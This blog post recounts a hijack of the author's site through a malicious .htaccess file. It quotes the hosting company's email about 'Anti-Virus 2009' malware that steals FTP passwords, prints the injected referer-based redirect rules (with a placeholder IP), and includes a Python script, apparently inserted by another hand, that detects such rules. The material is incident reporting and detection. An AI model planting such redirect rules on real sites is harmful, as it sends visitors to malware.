This Blog Was Hijacked. Shame On IX Web Hosting

Yesterday my brother called me up to let me know that when clicking a link in Google Reader to get to this blog, a malicious website appears instead of the blog. I tried it myself and he was right. The strange thing was that if you typed the address yourself it worked, but if you clicked a link inside Google Reader you would get to the malicious website.

I tried looking for what could have gone wrong. As I couldn’t find anything, I assumed maybe some kind of DNS poisoning occurred, that the solution is out of my reach and that if I wait it out a little bit everything will be back to normal.

So today I checked again and the problem still persisted. I decided to look further into things. Remembering an email message I got from my host, IX Web Hosting, I looked it up. Here it is:

Dear Amit,

In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our clients’ websites, including yours. This is a self-replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop-ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.

We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.

While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:

1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/malware-removal/uninstall-antivirus-2009

2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.

To illustrate the severity of the issue I would like to share some facts with you:

* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system

We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.

If you have questions regarding any of this information, please contact our support team anytime.

Kind Regards,

Fatima Said, CCO
IX Web Hosting
http://www.ixwebhosting.com

When I first got this message I thought it was a hoax. Considering that the computers I use to access my website all have Linux installed, “blaming” me for having the infamous Anti-Virus 2009 (which is a relatively new and very aggressive virus) on my computers is simply wrong, being impossible and all. So I ignored the message but still kept it (I thought about contacting IX Web Hosting to ask whether this was real but just forgot about it.)

Reading the message from IX Web Hosting again, though, got me to check my .htaccess file. And indeed the file contained the following lines:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://10.0.0.1/join.html?s=join [R,L]

These lines check the HTTP Referer header of each request: if it contains one of those search engine names (the [NC] flag makes the match case-insensitive, and [OR] chains the conditions together), the request is redirected to the address on the last line (I changed the IP address intentionally.) Visitors who type the address directly send no Referer and are never redirected, which is why the site looked fine to me but not to anyone arriving from a search engine or Google Reader. Once I deleted the file from the website’s root directory everything was back to normal. Now I wanted to know how long my blog had been hijacked. My Google Analytics account revealed the answer: my search engine sources dropped to almost zero around December 14th (about a month ago.)
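To make the behaviour of those rules concrete, here is a small added example (my own illustration, not code from the post or from IX Web Hosting). It parses a .htaccess rule set, evaluates the RewriteCond chain the way mod_rewrite does (conditions are ANDed unless joined by [OR]; [NC] means case-insensitive), and flags any RewriteRule that redirects off-site only for certain referrers, which is exactly the signature of this hijack. The sample rule set is the one from the post with the same placeholder IP; the site hostname example.org is an assumption.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample: the rule set found in the post, redirect target is the
# post's placeholder IP, not a real malicious host.
HIJACKED_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://10.0.0.1/join.html?s=join [R,L]
"""


@dataclass
class Cond:
    var: str        # e.g. %{HTTP_REFERER}
    pattern: str    # regex tested against the variable's value
    flags: set      # e.g. {"NC", "OR"}


@dataclass
class Rule:
    conds: list     # RewriteCond lines that precede this RewriteRule
    pattern: str    # regex tested against the request path
    target: str     # substitution / redirect target
    flags: set      # e.g. {"R", "L"}


def _flags(token):
    """'[NC,OR]' -> {'NC', 'OR'}; no token -> empty set."""
    if not token:
        return set()
    return {f.strip().upper() for f in token.strip("[]").split(",") if f.strip()}


def parse_htaccess(text):
    """Group each RewriteRule with the RewriteCond lines that apply to it."""
    rules, pending = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        opt = parts[3] if len(parts) > 3 else ""
        if directive == "rewritecond" and len(parts) >= 3:
            pending.append(Cond(parts[1], parts[2], _flags(opt)))
        elif directive == "rewriterule" and len(parts) >= 3:
            rules.append(Rule(pending, parts[1], parts[2], _flags(opt)))
            pending = []
    return rules


def conds_match(conds, env):
    """mod_rewrite semantics: conditions AND together, [OR] joins a condition
    with the next one, so c1 [OR] c2 [OR] c3, c4 means (c1 or c2 or c3) and c4."""
    overall, group = True, None
    for c in conds:
        value = env.get(c.var.strip("%{}"), "")
        hit = re.search(c.pattern, value, re.IGNORECASE if "NC" in c.flags else 0) is not None
        group = hit if group is None else (group or hit)
        if "OR" not in c.flags:          # condition closes the current OR-group
            overall = overall and group
            group = None
    if group is not None:                # dangling [OR] on the last condition
        overall = overall and group
    return overall


def _is_redirect(rule):
    return any(f == "R" or f.startswith("R=") for f in rule.flags)


def redirect_for(rules, path, referer, site_host):
    """Return the off-site URL a request with this Referer would be sent to, or None."""
    env = {"HTTP_REFERER": referer}
    for r in rules:
        if not re.search(r.pattern, path) or not conds_match(r.conds, env):
            continue
        host = urlparse(r.target).hostname
        if _is_redirect(r) and host and host != site_host:
            return r.target
        if "L" in r.flags:
            break
    return None


def audit(text, site_host):
    """Flag rules that redirect off-site and are conditioned on the Referer:
    the pattern of the hijack described in the post. Returns (target, patterns)."""
    findings = []
    for r in parse_htaccess(text):
        host = urlparse(r.target).hostname
        on_referer = any("HTTP_REFERER" in c.var.upper() for c in r.conds)
        if _is_redirect(r) and host and host != site_host and on_referer:
            findings.append((r.target, [c.pattern for c in r.conds]))
    return findings


if __name__ == "__main__":
    rules = parse_htaccess(HIJACKED_HTACCESS)
    print("typed in directly:", redirect_for(rules, "/", "", "example.org"))
    print("from Google Reader:", redirect_for(rules, "/", "http://www.google.com/reader/view/", "example.org"))
    print("audit findings:", audit(HIJACKED_HTACCESS, "example.org"))
```

Running the audit over every .htaccess under a site's document root is a cheap periodic check; a legitimate rewrite such as an internal redirect to a path on the same host (no foreign hostname, no Referer condition) is not flagged.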

Digging further, I found this post on the IX Web Hosting Warning blog. The writer of the post seems to think, like me, that IX Web Hosting are simply trying to shift the blame to the customers, which is a big shame.

Up until today I was generally happy with IX Web Hosting. I almost never had any problems with the website and whenever I needed support they answered quickly and resolved any issues I had. But reading through the IX Web Hosting Warning blog made me want to switch hosts (again.) I guess I’ll do that when I’m back from my trip and hope for the best until then. I just can’t be bothered right now with switching hosts.